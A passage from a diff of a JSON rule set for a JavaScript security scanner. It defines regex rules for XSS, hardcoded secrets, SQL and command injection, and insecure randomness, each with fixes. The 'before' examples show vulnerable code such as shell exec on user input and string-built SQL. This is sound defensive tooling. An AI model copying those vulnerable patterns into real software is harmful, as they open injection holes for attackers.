"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
|
||||
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
|
||||
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-secret",
|
||||
"category": "hardcoded-secret",
|
||||
"severity": "critical",
|
||||
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
|
||||
"patternType": "regex",
|
||||
"caseInsensitive": true,
|
||||
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
|
||||
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
|
||||
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
|
||||
},
|
||||
{
|
||||
"id": "sql-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
|
||||
"patternType": "regex",
|
||||
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
|
||||
"recommendation": "Use parameterized queries or prepared statements with placeholders",
|
||||
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
|
||||
},
|
||||
{
|
||||
"id": "command-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
|
||||
"patternType": "regex",
|
||||
"description": "Command execution with user input can lead to command injection attacks",
|
||||
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
|
||||
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
|
||||
},
|
||||
{
|
||||
"id": "insecure-random",
|
||||
"category": "cryptography",
|
||||
"severity": "high",
|
||||
"pattern": "Math\\.random\\(\\)",
|
||||
"patternType": "includes",
|
||||
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
|
||||
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
|
||||
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
|
||||
}
|
||||
]
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user